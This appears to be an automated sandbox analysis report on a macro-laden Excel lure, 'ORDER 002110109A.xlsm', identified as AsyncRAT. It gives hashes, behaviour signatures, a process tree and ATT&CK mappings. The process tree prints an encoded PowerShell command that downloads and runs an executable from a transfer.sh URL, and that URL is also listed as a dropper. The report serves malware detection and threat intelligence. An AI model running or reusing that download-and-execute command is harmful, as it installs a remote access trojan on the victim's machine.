Analysis

  • max time kernel
    151s
  • max time network
    159s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    10-10-2021 11:48

General

  • Target

    ORDER 002110109A.xlsm

  • Size

    388KB

  • MD5

    fddb915231bd05bdb40250bd9ca9327a

  • SHA1

    95e69dffccc8c93611de153fd9993faefc4b0f5f

  • SHA256

    06e223bb2af0e00e3c5c7d2a0574e0cf69716f82432665221d49f62a8613b5ed

  • SHA512

    da06766a2de1c0008ee9ed1d575bf8500a09ba511d056beb2c84e44ce7457d7e319c156695176de87247ca7faac68ea65af6216d47075f67341e6c2b61b13b43

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://transfer.sh/get/ii6Fqb/word.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER 002110109A.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Wzjokpltbfr.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBLAGcAdwB1AGcAcgBmAG0AYQB1AGsAYgBjAGIAawBnAHUAbQB1AC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBpAGkANgBGAHEAYgAvAHcAbwByAGQALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
          "C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:744
          • C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
            C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2676

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kgwugrfmaukbcbkgumu.exe.log
    MD5

    605f809fab8c19729d39d075f7ffdb53

    SHA1

    c546f877c9bd53563174a90312a8337fdfc5fdd9

    SHA256

    6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

    SHA512

    82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

  • C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
    MD5

    4adb3a47d33b76506499d2be6b60351a

    SHA1

    5305fdc90c3ba06867d3765e826c1fa1312d7e0f

    SHA256

    d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

    SHA512

    9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

  • C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
    MD5

    4adb3a47d33b76506499d2be6b60351a

    SHA1

    5305fdc90c3ba06867d3765e826c1fa1312d7e0f

    SHA256

    d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

    SHA512

    9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

  • C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
    MD5

    4adb3a47d33b76506499d2be6b60351a

    SHA1

    5305fdc90c3ba06867d3765e826c1fa1312d7e0f

    SHA256

    d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

    SHA512

    9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

  • C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
    MD5

    4adb3a47d33b76506499d2be6b60351a

    SHA1

    5305fdc90c3ba06867d3765e826c1fa1312d7e0f

    SHA256

    d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

    SHA512

    9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

  • C:\Users\Admin\Documents\Wzjokpltbfr.bat
    MD5

    29e9b22feef3c9266a3228072aff9cca

    SHA1

    a7632e340c2929ed5dace6c266250cebc3c13ab2

    SHA256

    04f1edaab7365adc160f7a50e9376ae3cfa717900765fad12fbd67c5fc767684

    SHA512

    775587f577aa0be54a33ecac0ded78d4780cfeca3973867f296c543f37f21008e353772c096d4e4992298a995868a4715197950976dde2b3f55339c6d8c49f82

  • memory/744-321-0x0000000000000000-mapping.dmp
  • memory/744-340-0x0000000005380000-0x0000000005381000-memory.dmp
    Filesize

    4KB

  • memory/804-114-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp
    Filesize

    64KB

  • memory/804-117-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp
    Filesize

    64KB

  • memory/804-120-0x000001F12FE10000-0x000001F12FE12000-memory.dmp
    Filesize

    8KB

  • memory/804-121-0x000001F12FE10000-0x000001F12FE12000-memory.dmp
    Filesize

    8KB

  • memory/804-115-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp
    Filesize

    64KB

  • memory/804-116-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp
    Filesize

    64KB

  • memory/804-118-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp
    Filesize

    64KB

  • memory/804-119-0x000001F12FE10000-0x000001F12FE12000-memory.dmp
    Filesize

    8KB

  • memory/1240-292-0x0000000000000000-mapping.dmp
  • memory/1240-312-0x0000021C37D36000-0x0000021C37D38000-memory.dmp
    Filesize

    8KB

  • memory/1240-302-0x0000021C37D33000-0x0000021C37D35000-memory.dmp
    Filesize

    8KB

  • memory/1240-301-0x0000021C37D30000-0x0000021C37D32000-memory.dmp
    Filesize

    8KB

  • memory/1884-290-0x0000000000000000-mapping.dmp
  • memory/2676-334-0x000000000040C75E-mapping.dmp
  • memory/2676-341-0x00000000052E0000-0x00000000052E1000-memory.dmp
    Filesize

    4KB